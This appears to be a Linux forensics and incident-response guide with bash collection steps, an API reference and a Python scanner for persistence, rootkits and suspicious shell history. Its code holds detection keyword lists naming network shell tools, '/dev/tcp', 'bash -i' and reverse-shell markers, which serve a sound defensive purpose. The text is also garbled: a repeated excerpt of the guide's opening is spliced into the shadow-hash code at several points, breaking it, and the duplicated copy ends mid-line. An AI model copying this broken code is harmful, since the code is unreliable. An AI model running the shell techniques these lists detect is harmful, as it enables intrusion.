Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'SHA-512'\n elif pwd_hash.startswith('$5

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'SHA-256'\n elif pwd_hash.startswith('$y

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'yescrypt'\n elif pwd_hash.startswith('$1

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'MD5 (WEAK)'\n print(f\" {username}: {hash_type} hash, last changed: day {last_change}\")\nPYEOF\n\n# Analyze login history\nlast -f /cases/case-2024-001/linux/logs/wtmp > /cases/case-2024-001/linux/analysis/login_history.txt\nlastb -f /cases/case-2024-001/linux/logs/btmp > /cases/case-2024-001/linux/analysis/failed_logins.txt 2>/dev/null\n```\n\n### Step 3: Examine Persistence Mechanisms\n\n```bash\n# Check cron jobs for all users\necho \"=== CRON JOBS ===\" > /cases/case-2024-001/linux/persistence/cron_analysis.txt\n\n# System cron\nfor cronfile in /mnt/evidence/etc/crontab /mnt/evidence/etc/cron.d/*; do\n echo \"--- $cronfile ---\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n cat \"$cronfile\" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n echo \"\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\ndone\n\n# User cron tabs\nfor cronfile in /mnt/evidence/var/spool/cron/crontabs/*; do\n echo \"--- User crontab: $(basename $cronfile) ---\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n cat \"$cronfile\" 2>/dev/null >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\n echo \"\" >> /cases/case-2024-001/linux/persistence/cron_analysis.txt\ndone\n\n# Check systemd services for persistence\necho \"=== SYSTEMD SERVICES ===\" > /cases/case-2024-001/linux/persistence/systemd_analysis.txt\nfind /mnt/evidence/etc/systemd/system/ -name \"*.service\" -newer /mnt/evidence/etc/os-release \\\n >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\n\nfor svc in /mnt/evidence/etc/systemd/system/*.service; do\n echo \"--- $(basename $svc) ---\" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\n cat \"$svc\" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\n echo \"\" >> /cases/case-2024-001/linux/persistence/systemd_analysis.txt\ndone\n\n# Check authorized SSH keys (backdoor detection)\necho \"=== SSH AUTHORIZED KEYS ===\" > /cases/case-2024-001/linux/persistence/ssh_keys.txt\nfind /mnt/evidence/home/ /mnt/evidence/root/ -name \"authorized_keys\" -exec sh -c \\\n 'echo \"--- {} ---\"; cat {}; echo \"\"' \\; >> /cases/case-2024-001/linux/persistence/ssh_keys.txt\n\n# Check rc.local and init scripts\ncat /mnt/evidence/etc/rc.local 2>/dev/null > /cases/case-2024-001/linux/persistence/rc_local.txt\n\n# Check /etc/profile.d/ for login-triggered scripts\nls -la /mnt/evidence/etc/profile.d/ > /cases/case-2024-001/linux/persistence/profile_scripts.txt\n\n# Check for LD_PRELOAD hijacking\ngrep -r \"LD_PRELOAD\" /mnt/evidence/etc/ 2>/dev/null > /cases/case-2024-001/linux/persistence/ld_preload.txt\ncat /mnt/evidence/etc/ld.so.preload 2>/dev/null >> /cases/case-2024-001/linux/persistence/ld_preload.txt\n```\n\n### Step 4: Analyze Shell History and Command Execution\n\n```bash\n# Analyze bash history for each user\npython3 \u003c\u003c 'PYEOF'\nimport os, glob\n\nprint(\"=== SHELL HISTORY ANALYSIS ===\\n\")\n\nsuspicious_commands = [\n 'wget', 'curl', 'nc ', 'ncat', 'netcat', 'python -c', 'python3 -c',\n 'perl -e', 'base64', 'chmod 777', 'chmod +s', '/dev/tcp', '/dev/udp',\n 'nmap', 'masscan', 'hydra', 'john', 'hashcat', 'passwd', 'useradd',\n 'iptables -F', 'ufw disable', 'history -c', 'rm -rf /', 'dd if=',\n 'crontab', 'at ', 'systemctl enable', 'ssh-keygen', 'scp ', 'rsync',\n 'tar czf', 'zip -r', 'openssl enc', 'gpg --encrypt', 'shred',\n 'chattr', 'setfacl', 'awk', '/tmp/', '/dev/shm/'\n]\n\nfor hist_file in glob.glob('/cases/case-2024-001/linux/users/*/.bash_history'):\n username = hist_file.split('/')[-2]\n print(f\"User: {username}\")\n\n with open(hist_file, 'r', errors='ignore') as f:\n lines = f.readlines()\n\n print(f\" Total commands: {len(lines)}\")\n flagged = []\n for i, line in enumerate(lines):\n line = line.strip()\n for cmd in suspicious_commands:\n if cmd in line.lower():\n flagged.append((i+1, line))\n break\n\n if flagged:\n print(f\" Suspicious commands: {len(flagged)}\")\n for lineno, cmd in flagged:\n print(f\" Line {lineno}: {cmd[:120]}\")\n print()\nPYEOF\n```\n\n### Step 5: Check for Rootkits and Modified Binaries\n\n```bash\n# Check for known rootkit indicators\n# Compare system binary hashes against known-good\nfind /mnt/evidence/usr/bin/ /mnt/evidence/usr/sbin/ /mnt/evidence/bin/ /mnt/evidence/sbin/ \\\n -type f -executable -exec sha256sum {} \\; > /cases/case-2024-001/linux/analysis/binary_hashes.txt\n\n# Check for SUID/SGID binaries (potential privilege escalation)\nfind /mnt/evidence/ -perm -4000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/suid_files.txt\nfind /mnt/evidence/ -perm -2000 -type f 2>/dev/null > /cases/case-2024-001/linux/analysis/sgid_files.txt\n\n# Check for suspicious files in /tmp and /dev/shm\nfind /mnt/evidence/tmp/ /mnt/evidence/dev/shm/ -type f 2>/dev/null \\\n -exec file {} \\; > /cases/case-2024-001/linux/analysis/tmp_files.txt\n\n# Check for hidden files and directories\nfind /mnt/evidence/ -name \".*\" -not -path \"*/\\.\" -type f 2>/dev/null | \\\n head -100 > /cases/case-2024-001/linux/analysis/hidden_files.txt\n\n# Check kernel modules\nls -la /mnt/evidence/lib/modules/$(ls /mnt/evidence/lib/modules/ | head -1)/extra/ 2>/dev/null \\\n > /cases/case-2024-001/linux/analysis/extra_modules.txt\n\n# Check for modified PAM configuration (authentication backdoors)\ndiff /mnt/evidence/etc/pam.d/ /cases/baseline/pam.d/ 2>/dev/null \\\n > /cases/case-2024-001/linux/analysis/pam_changes.txt\n```\n\n## Key Concepts\n\n| Concept | Description |\n|---------|-------------|\n| /var/log/auth.log | Primary authentication log on Debian/Ubuntu systems |\n| /var/log/secure | Primary authentication log on RHEL/CentOS systems |\n| wtmp/btmp | Binary logs recording successful and failed login sessions |\n| .bash_history | User command history file (can be cleared by attackers) |\n| crontab | Scheduled task system commonly used for persistence |\n| authorized_keys | SSH public keys granting passwordless access to an account |\n| SUID bit | File permission allowing execution as the file owner (privilege escalation vector) |\n| LD_PRELOAD | Environment variable that loads a shared library before all others (hooking technique) |\n\n## Tools & Systems\n\n| Tool | Purpose |\n|------|---------|\n| chkrootkit | Rootkit detection scanner for Linux systems |\n| rkhunter | Rootkit Hunter - checks for rootkits, backdoors, and local exploits |\n| AIDE | Advanced Intrusion Detection Environment - file integrity monitor |\n| auditd | Linux audit framework for system call and file access monitoring |\n| last/lastb | Parse wtmp/btmp for login and failed login history |\n| Plaso/log2timeline | Super-timeline creation including Linux artifacts |\n| osquery | SQL-based system querying for live forensic investigation |\n| Velociraptor | Endpoint agent with Linux artifact collection capabilities |\n\n## Common Scenarios\n\n**Scenario 1: SSH Brute Force Followed by Compromise**\nAnalyze auth.log for failed SSH attempts followed by success, identify the attacking IP, check .bash_history for post-compromise commands, examine authorized_keys for added backdoor keys, check crontab for persistence, review network connections.\n\n**Scenario 2: Web Server Compromise via Application Vulnerability**\nExamine web server access and error logs for exploitation attempts, check /tmp and /dev/shm for webshells, analyze the web server user's activity (www-data), check for privilege escalation via SUID binaries or kernel exploits, review outbound connections.\n\n**Scenario 3: Insider Threat on Database Server**\nAnalyze the suspect user's bash_history for database dump commands, check for large tar/zip files in home directory or /tmp, examine scp/rsync commands for data transfer, review cron jobs for automated exfiltration, check USB device logs.\n\n**Scenario 4: Crypto-Miner on Cloud Instance**\nCheck for high-CPU processes in /proc (live) or systemd service files, examine crontab entries for miner restart scripts, check /tmp for mining binaries, analyze network connections for mining pool communications, review authorized_keys for attacker access.\n\n## Output Format\n\n```\nLinux Forensics Summary:\n System: webserver01 (Ubuntu 22.04 LTS)\n Hostname: webserver01.corp.local\n Kernel: 5.15.0-91-generic\n\n User Accounts:\n Total: 25 (3 with UID 0 - 1 ANOMALOUS)\n Interactive shells: 8 users\n Recently created: admin2 (created 2024-01-15)\n\n Authentication Events:\n Successful SSH logins: 456\n Failed SSH attempts: 12,345 (from 23 unique IPs)\n Sudo executions: 89\n\n Persistence Mechanisms Found:\n Cron jobs: 3 suspicious (reverse shell, miner restart)\n Systemd services: 1 unknown (update-checker.service)\n SSH keys: 2 unauthorized keys in root authorized_keys\n rc.local: Modified with download cradle\n\n Suspicious Activity:\n - bash_history contains wget to pastebin URL\n - SUID binary /tmp/.hidden/escalate found\n - /dev/shm/ contains compiled ELF binary\n - LD_PRELOAD in /etc/ld.so.preload pointing to /lib/.hidden.so\n\n Report: /cases/case-2024-001/linux/analysis/\n```\n---","attachment_filenames":["references/api-reference.md","scripts/agent.py"],"attachments":[{"filename":"references/api-reference.md","content":"# API Reference: Linux Forensic Artifact Analysis Tools\n\n## Key Artifact Locations\n\n| Artifact | Path | Description |\n|----------|------|-------------|\n| Auth logs | `/var/log/auth.log` (Debian) `/var/log/secure` (RHEL) | Authentication events |\n| Login history | `/var/log/wtmp` | Successful logins (binary, use `last`) |\n| Failed logins | `/var/log/btmp` | Failed logins (binary, use `lastb`) |\n| Bash history | `~/.bash_history` | Command history per user |\n| SSH keys | `~/.ssh/authorized_keys` | Authorized public keys |\n| Crontab | `/etc/crontab`, `/var/spool/cron/crontabs/` | Scheduled tasks |\n| Systemd services | `/etc/systemd/system/` | Service definitions |\n| LD_PRELOAD | `/etc/ld.so.preload` | Shared library preloading |\n| SUID binaries | `find / -perm -4000` | Setuid executables |\n\n## last / lastb - Login History\n\n### Syntax\n```bash\nlast -f /var/log/wtmp # Successful logins\nlastb -f /var/log/btmp # Failed logins\nlast -i -f /var/log/wtmp # Show IP addresses\nlast -s 2024-01-15 -t 2024-01-20 # Date range filter\n```\n\n### Output Format\n```\nuser pts/0 192.168.1.50 Mon Jan 15 09:00 still logged in\n```\n\n## chkrootkit - Rootkit Scanner\n\n### Syntax\n```bash\nchkrootkit # Full scan\nchkrootkit -r /mnt/evidence # Scan mounted evidence\nchkrootkit -q # Quiet (infected only)\n```\n\n## rkhunter - Rootkit Hunter\n\n### Syntax\n```bash\nrkhunter --check # Full system check\nrkhunter --check --rootdir /mnt/ev # Check evidence root\nrkhunter --list tests # List available tests\nrkhunter --propupd # Update file properties DB\n```\n\n### Check Categories\n| Check | Description |\n|-------|-------------|\n| `rootkits` | Known rootkit signatures |\n| `trojans` | Trojanized system binaries |\n| `properties` | File permission anomalies |\n| `filesystem` | Hidden files and directories |\n\n## auditd Log Parsing\n\n### ausearch Syntax\n```bash\nausearch -m execve -ts recent # Recent command execution\nausearch -m USER_AUTH -ts today # Authentication events\nausearch -k suspicious_activity # Custom audit rule key\nausearch -ua 0 -ts today # Root user actions\n```\n\n### aureport Syntax\n```bash\naureport --auth # Authentication summary\naureport --login # Login summary\naureport --file # File access summary\naureport --summary # Overall summary\n```\n\n## osquery - SQL-based System Queries\n\n### Syntax\n```bash\nosqueryi \"SELECT * FROM users WHERE uid = 0\"\nosqueryi \"SELECT * FROM crontab\"\nosqueryi \"SELECT * FROM authorized_keys\"\nosqueryi \"SELECT * FROM suid_bin\"\nosqueryi \"SELECT * FROM process_open_sockets\"\n```\n\n### Key Tables\n| Table | Content |\n|-------|---------|\n| `users` | User account information |\n| `crontab` | Cron job entries |\n| `authorized_keys` | SSH authorized keys |\n| `suid_bin` | SUID binaries |\n| `process_open_sockets` | Network connections by process |\n| `shell_history` | Command history entries |\n\n## Plaso / log2timeline - Super Timeline\n\n### Syntax\n```bash\nlog2timeline.py /cases/timeline.plaso /mnt/evidence\npsort.py -o l2tcsv /cases/timeline.plaso > timeline.csv\npsort.py -o l2tcsv /cases/timeline.plaso \"date > '2024-01-15'\"\n```\n\n## AIDE - File Integrity\n\n### Syntax\n```bash\naide --init # Initialize database\naide --check # Check for changes\naide --compare # Compare databases\n```\n","content_type":"text/markdown; charset=utf-8","language":"markdown","size":3491,"content_sha256":"965f675c920085a7a68dcc41a7effc5eb5dc59b957194405d2b1d028d288c668"},{"filename":"scripts/agent.py","content":"#!/usr/bin/env python3\n\"\"\"Linux system artifact forensics agent for investigating compromised systems.\"\"\"\n\nimport os\nimport sys\nimport glob\nimport shlex\nimport subprocess\n\n\ndef run_cmd(cmd):\n \"\"\"Execute a command and return output.\"\"\"\n if isinstance(cmd, str):\n cmd = shlex.split(cmd)\n result = subprocess.run(cmd, capture_output=True, text=True, timeout=30)\n return result.stdout.strip(), result.stderr.strip(), result.returncode\n\n\ndef analyze_passwd(passwd_path):\n \"\"\"Analyze /etc/passwd for suspicious accounts.\"\"\"\n findings = []\n with open(passwd_path, \"r\") as f:\n for line in f:\n parts = line.strip().split(\":\")\n if len(parts) \u003c 7:\n continue\n username, _, uid, gid = parts[0], parts[1], int(parts[2]), int(parts[3])\n home, shell = parts[5], parts[6]\n if uid == 0 and username != \"root\":\n findings.append({\n \"severity\": \"CRITICAL\",\n \"finding\": f\"UID 0 account: {username} (shell: {shell})\",\n })\n login_shells = [\"/bin/bash\", \"/bin/sh\", \"/bin/zsh\", \"/usr/bin/zsh\"]\n if uid \u003c 1000 and uid > 0 and shell in login_shells:\n findings.append({\n \"severity\": \"WARNING\",\n \"finding\": f\"System account with login shell: {username} (UID:{uid})\",\n })\n if uid >= 1000 and shell not in [\"/bin/false\", \"/usr/sbin/nologin\", \"/bin/sync\"]:\n findings.append({\n \"severity\": \"INFO\",\n \"finding\": f\"Interactive user: {username} (UID:{uid}, Home:{home})\",\n })\n return findings\n\n\ndef analyze_shadow(shadow_path):\n \"\"\"Analyze /etc/shadow for password hash types and status.\"\"\"\n findings = []\n with open(shadow_path, \"r\") as f:\n for line in f:\n parts = line.strip().split(\":\")\n if len(parts) \u003c 3:\n continue\n username = parts[0]\n pwd_hash = parts[1]\n if pwd_hash and pwd_hash not in (\"*\", \"!\", \"!!\", \"\"):\n hash_type = \"Unknown\"\n if pwd_hash.startswith(\"$6$\"):\n hash_type = \"SHA-512\"\n elif pwd_hash.startswith(\"$5$\"):\n hash_type = \"SHA-256\"\n elif pwd_hash.startswith(\"$y$\"):\n hash_type = \"yescrypt\"\n elif pwd_hash.startswith(\"$1$\"):\n hash_type = \"MD5 (WEAK)\"\n findings.append({\n \"severity\": \"WARNING\",\n \"finding\": f\"{username} uses weak MD5 password hash\",\n })\n findings.append({\n \"severity\": \"INFO\",\n \"finding\": f\"{username}: {hash_type} hash, last changed day {parts[2]}\",\n })\n return findings\n\n\ndef analyze_bash_history(history_path, username=\"unknown\"):\n \"\"\"Analyze bash history for suspicious commands.\"\"\"\n suspicious_patterns = [\n \"wget\", \"curl\", \"nc \", \"ncat\", \"netcat\", \"python -c\", \"python3 -c\",\n \"perl -e\", \"base64\", \"chmod 777\", \"chmod +s\", \"/dev/tcp\", \"/dev/udp\",\n \"nmap\", \"masscan\", \"hydra\", \"john\", \"hashcat\", \"passwd\", \"useradd\",\n \"iptables -F\", \"ufw disable\", \"history -c\", \"rm -rf\", \"dd if=\",\n \"crontab\", \"systemctl enable\", \"ssh-keygen\", \"scp \", \"rsync\",\n \"/tmp/\", \"/dev/shm/\", \"mkfifo\", \"socat\",\n ]\n findings = []\n with open(history_path, \"r\", errors=\"ignore\") as f:\n lines = f.readlines()\n for i, line in enumerate(lines):\n line_stripped = line.strip()\n for pattern in suspicious_patterns:\n if pattern in line_stripped.lower():\n findings.append({\n \"user\": username,\n \"line_number\": i + 1,\n \"command\": line_stripped[:200],\n \"matched_pattern\": pattern,\n })\n break\n return findings\n\n\ndef check_cron_persistence(evidence_root):\n \"\"\"Check cron jobs for persistence mechanisms.\"\"\"\n findings = []\n cron_paths = [\n os.path.join(evidence_root, \"etc/crontab\"),\n *glob.glob(os.path.join(evidence_root, \"etc/cron.d/*\")),\n *glob.glob(os.path.join(evidence_root, \"var/spool/cron/crontabs/*\")),\n ]\n for cron_path in cron_paths:\n if os.path.exists(cron_path) and os.path.isfile(cron_path):\n with open(cron_path, \"r\", errors=\"ignore\") as f:\n for line in f:\n line = line.strip()\n if line and not line.startswith(\"#\"):\n suspicious = any(\n p in line.lower()\n for p in [\"wget\", \"curl\", \"/tmp/\", \"/dev/shm/\", \"base64\",\n \"python\", \"bash -i\", \"reverse\", \"nc \", \"ncat\"]\n )\n if suspicious:\n findings.append({\n \"severity\": \"HIGH\",\n \"source\": cron_path,\n \"entry\": line[:200],\n })\n return findings\n\n\ndef check_ssh_keys(evidence_root):\n \"\"\"Check for unauthorized SSH authorized_keys.\"\"\"\n findings = []\n key_files = glob.glob(\n os.path.join(evidence_root, \"home/*/.ssh/authorized_keys\")\n ) + glob.glob(\n os.path.join(evidence_root, \"root/.ssh/authorized_keys\")\n )\n for key_file in key_files:\n if os.path.exists(key_file):\n with open(key_file, \"r\") as f:\n keys = [l.strip() for l in f if l.strip() and not l.startswith(\"#\")]\n if keys:\n findings.append({\n \"file\": key_file,\n \"key_count\": len(keys),\n \"keys\": [k[:80] + \"...\" for k in keys],\n })\n return findings\n\n\ndef check_systemd_persistence(evidence_root):\n \"\"\"Check for suspicious systemd service files.\"\"\"\n findings = []\n service_dirs = [\n os.path.join(evidence_root, \"etc/systemd/system\"),\n os.path.join(evidence_root, \"usr/lib/systemd/system\"),\n ]\n for svc_dir in service_dirs:\n if not os.path.exists(svc_dir):\n continue\n for svc_file in glob.glob(os.path.join(svc_dir, \"*.service\")):\n with open(svc_file, \"r\", errors=\"ignore\") as f:\n content = f.read()\n suspicious = any(\n p in content.lower()\n for p in [\"/tmp/\", \"/dev/shm/\", \"wget\", \"curl\", \"reverse\",\n \"bash -i\", \"nc \", \"python\", \"base64\"]\n )\n if suspicious:\n findings.append({\n \"severity\": \"HIGH\",\n \"file\": svc_file,\n \"preview\": content[:300],\n })\n return findings\n\n\ndef check_ld_preload(evidence_root):\n \"\"\"Check for LD_PRELOAD rootkit indicators.\"\"\"\n findings = []\n preload_path = os.path.join(evidence_root, \"etc/ld.so.preload\")\n if os.path.exists(preload_path):\n with open(preload_path, \"r\") as f:\n content = f.read().strip()\n if content:\n findings.append({\n \"severity\": \"CRITICAL\",\n \"finding\": f\"/etc/ld.so.preload contains: {content}\",\n })\n return findings\n\n\ndef find_suid_binaries(evidence_root):\n \"\"\"Find SUID/SGID binaries (potential privilege escalation).\"\"\"\n result = subprocess.run(\n [\"find\", evidence_root, \"-perm\", \"-4000\", \"-type\", \"f\"],\n capture_output=True, text=True, timeout=30\n )\n stdout = result.stdout.strip()\n return stdout.splitlines() if result.returncode == 0 and stdout else []\n\n\ndef find_suspicious_tmp_files(evidence_root):\n \"\"\"Find suspicious files in /tmp and /dev/shm.\"\"\"\n findings = []\n for tmp_dir in [\"tmp\", \"dev/shm\"]:\n full_path = os.path.join(evidence_root, tmp_dir)\n if os.path.exists(full_path):\n for root, dirs, files in os.walk(full_path):\n for fname in files:\n fpath = os.path.join(root, fname)\n findings.append(fpath)\n return findings\n\n\nif __name__ == \"__main__\":\n print(\"=\" * 60)\n print(\"Linux System Artifacts Forensics Agent\")\n print(\"User accounts, persistence, shell history, rootkit detection\")\n print(\"=\" * 60)\n\n evidence_root = sys.argv[1] if len(sys.argv) > 1 else \"/mnt/evidence\"\n\n if os.path.exists(evidence_root):\n print(f\"\\n[*] Examining evidence root: {evidence_root}\")\n\n passwd_path = os.path.join(evidence_root, \"etc/passwd\")\n if os.path.exists(passwd_path):\n print(\"\\n--- User Account Analysis ---\")\n for f in analyze_passwd(passwd_path):\n print(f\" [{f['severity']}] {f['finding']}\")\n\n print(\"\\n--- Cron Persistence ---\")\n cron = check_cron_persistence(evidence_root)\n for c in cron:\n print(f\" [{c['severity']}] {c['source']}: {c['entry'][:80]}\")\n\n print(\"\\n--- SSH Authorized Keys ---\")\n ssh = check_ssh_keys(evidence_root)\n for s in ssh:\n print(f\" {s['file']}: {s['key_count']} keys\")\n\n print(\"\\n--- Systemd Persistence ---\")\n systemd = check_systemd_persistence(evidence_root)\n for s in systemd:\n print(f\" [{s['severity']}] {s['file']}\")\n\n print(\"\\n--- LD_PRELOAD Rootkit Check ---\")\n ld = check_ld_preload(evidence_root)\n for l in ld:\n print(f\" [{l['severity']}] {l['finding']}\")\n\n print(\"\\n--- Suspicious Temp Files ---\")\n tmp = find_suspicious_tmp_files(evidence_root)\n for t in tmp[:20]:\n print(f\" {t}\")\n else:\n print(f\"\\n[DEMO] Usage: python agent.py \u003cevidence_mount_point>\")\n print(\"[*] Mount a forensic image and provide the path for analysis.\")\n","content_type":"text/x-python; charset=utf-8","language":"python","size":9952,"content_sha256":"1075135007001b405b49bd5549cd0a3069f44fbc82715b8d312129cb677213dd"}],"content_json":{"type":"doc","content":[{"type":"heading","attrs":{"level":1},"content":[{"text":"Analyzing Linux System Artifacts","type":"text"}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"When to Use","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When investigating a compromised Linux server or workstation","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"For identifying persistence mechanisms (cron, systemd, SSH keys)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"When tracing user activity through shell history and authentication logs","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"During incident response to determine the scope of a Linux-based breach","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"For detecting rootkits, backdoors, and unauthorized modifications","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Prerequisites","type":"text"}]},{"type":"bullet_list","content":[{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Forensic image or live access to the Linux system (read-only)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Understanding of Linux file system hierarchy (FHS)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Knowledge of common Linux logging locations (/var/log/)","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Tools: chkrootkit, rkhunter, AIDE, auditd logs","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Familiarity with systemd, cron, and PAM configurations","type":"text"}]}]},{"type":"list_item","content":[{"type":"paragraph","content":[{"text":"Root access for complete artifact collection","type":"text"}]}]}]},{"type":"heading","attrs":{"level":2},"content":[{"text":"Workflow","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 1: Mount and Collect System Artifacts","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Mount forensic image read-only\nmount -o ro,loop,offset=$((2048*512)) /cases/case-2024-001/images/linux_evidence.dd /mnt/evidence\n\n# Create collection directories\nmkdir -p /cases/case-2024-001/linux/{logs,config,users,persistence,network}\n\n# Collect authentication logs\ncp /mnt/evidence/var/log/auth.log* /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/secure* /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/syslog* /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/kern.log* /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/audit/audit.log* /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/wtmp /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/btmp /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/lastlog /cases/case-2024-001/linux/logs/\ncp /mnt/evidence/var/log/faillog /cases/case-2024-001/linux/logs/\n\n# Collect user artifacts\nfor user_dir in /mnt/evidence/home/*/; do\n username=$(basename \"$user_dir\")\n mkdir -p /cases/case-2024-001/linux/users/$username\n cp \"$user_dir\"/.bash_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp \"$user_dir\"/.zsh_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp -r \"$user_dir\"/.ssh/ /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp \"$user_dir\"/.bashrc /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp \"$user_dir\"/.profile /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp \"$user_dir\"/.viminfo /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp \"$user_dir\"/.wget-hsts /cases/case-2024-001/linux/users/$username/ 2>/dev/null\n cp \"$user_dir\"/.python_history /cases/case-2024-001/linux/users/$username/ 2>/dev/null\ndone\n\n# Collect root user artifacts\ncp /mnt/evidence/root/.bash_history /cases/case-2024-001/linux/users/root/ 2>/dev/null\ncp -r /mnt/evidence/root/.ssh/ /cases/case-2024-001/linux/users/root/ 2>/dev/null\n\n# Collect system configuration\ncp /mnt/evidence/etc/passwd /cases/case-2024-001/linux/config/\ncp /mnt/evidence/etc/shadow /cases/case-2024-001/linux/config/\ncp /mnt/evidence/etc/group /cases/case-2024-001/linux/config/\ncp /mnt/evidence/etc/sudoers /cases/case-2024-001/linux/config/\ncp -r /mnt/evidence/etc/sudoers.d/ /cases/case-2024-001/linux/config/\ncp /mnt/evidence/etc/hosts /cases/case-2024-001/linux/config/\ncp /mnt/evidence/etc/resolv.conf /cases/case-2024-001/linux/config/\ncp -r /mnt/evidence/etc/ssh/ /cases/case-2024-001/linux/config/","type":"text"}]},{"type":"heading","attrs":{"level":3},"content":[{"text":"Step 2: Analyze User Accounts and Authentication","type":"text"}]},{"type":"code_block","attrs":{"wrap":false,"language":"bash"},"content":[{"text":"# Analyze user accounts for anomalies\npython3 \u003c\u003c 'PYEOF'\nprint(\"=== USER ACCOUNT ANALYSIS ===\\n\")\n\n# Parse /etc/passwd\nwith open('/cases/case-2024-001/linux/config/passwd') as f:\n for line in f:\n parts = line.strip().split(':')\n if len(parts) >= 7:\n username, _, uid, gid, comment, home, shell = parts[0], parts[1], int(parts[2]), int(parts[3]), parts[4], parts[5], parts[6]\n\n # Flag accounts with UID 0 (root equivalent)\n if uid == 0 and username != 'root':\n print(f\" ALERT: UID 0 account: {username} (shell: {shell})\")\n\n # Flag accounts with login shells that shouldn't have them\n if shell not in ('/bin/false', '/usr/sbin/nologin', '/bin/sync') and uid >= 1000:\n print(f\" User: {username} (UID:{uid}, Shell:{shell}, Home:{home})\")\n\n # Flag system accounts with login shells\n if uid \u003c 1000 and uid > 0 and shell in ('/bin/bash', '/bin/sh', '/bin/zsh'):\n print(f\" WARNING: System account with shell: {username} (UID:{uid}, Shell:{shell})\")\n\n# Parse /etc/shadow for account status\nprint(\"\\n=== PASSWORD STATUS ===\")\nwith open('/cases/case-2024-001/linux/config/shadow') as f:\n for line in f:\n parts = line.strip().split(':')\n if len(parts) >= 3:\n username = parts[0]\n pwd_hash = parts[1]\n last_change = parts[2]\n\n if pwd_hash and pwd_hash not in ('*', '!', '!!', ''):\n hash_type = 'Unknown'\n if pwd_hash.startswith('$6

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'SHA-512'\n elif pwd_hash.startswith('$5

Analyzing Linux System Artifacts When to Use - When investigating a compromised Linux server or workstation - For identifying persistence mechanisms (cron, systemd, SSH keys) - When tracing user activity through shell history and authentication logs - During incident response to determine the scope of a Linux-based breach - For detecting rootkits, backdoors, and unauthorized modifications Prerequisites - Forensic image or live access to the Linux system (read-only) - Understanding of Linux file system hierarchy (FHS) - Knowledge of common Linux logging locations (/var/log/) - Tools: chkrootki…

): hash_type = 'SHA-256'\n elif pwd_hash.startswith('$y

